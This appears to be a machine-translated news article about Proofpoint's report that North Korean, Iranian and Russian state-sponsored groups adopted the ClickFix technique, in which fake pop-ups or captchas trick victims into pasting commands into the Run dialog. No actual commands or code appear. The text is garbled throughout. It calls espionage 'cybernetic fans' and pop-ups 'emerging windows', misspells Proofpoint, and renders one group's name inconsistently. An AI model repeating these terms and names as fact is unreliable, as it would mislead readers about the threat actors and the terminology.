- ProofPoint says that multiple groups sponsored by the state seen using the clickfix attack technique
- Russians, North Koreans and Iranians all involved
- Actors sponsored by the State are mainly dedicated to cybernetic fans
The clickfix attack technique has become so popular that even threat actors sponsored by the State are using it, the investigation of Proasppoint’s statements, after having observed at least three groups taking advantage of the method in the last quarter of 2024.
In an in -depth report, ProofPoint said he saw Kimsuky, Muddywater, unk_remotogue and APT28, all using clickfix in his attack chains.
Kimsuky is a well -known north Korea threat actor, Muddywater is Iranian, while unk_remotogue and APT28 are supposedly Russian. In addition to the North Korean Lázaro group, threat actors sponsored by the State are mainly dedicated to cybernetic fans, stealing confidential information for diplomats, critical infrastructure organizations, Think Tanks and similar organizations of adversary states.
Without revolution
“The incorporation of CLICKFIX is not revolutionizing the campaigns carried out by TA427, TA450, UNK_remotogogo and TA422, but replaces the installation and execution stages in the existing infection chains,” Proofpoint explained.
Clickfix has been in the headlines for months. It is a social engineering tactics similar to the old emerging windows of “you have a virus” that used to affect the Internet sites two decades ago.
Originally, the emerging window would invite the visitor to download and execute an antivirus program that, in fact, was just malware.
When the industry addressed this attack in hitting the infrastructure, Crooks turned to leave a phone number for alleged support of IT.
The victims who call this number would be fooled to install remote desktop programs, giving Crooks the ability to download and execute malware on their devices.
The clickfix attack takes this method and gives it a unique turn. It still begins with an emerging window, but sometimes the victims are also asked to “complete a captcha”, “verify their identity” or similar. The process does not require clicking on a download button, but asks them to copy and paste a command in their run program.
Although it sounds crazy, it has also been quite successful, demonstrated by the adoption of national states.
Through The hacker news
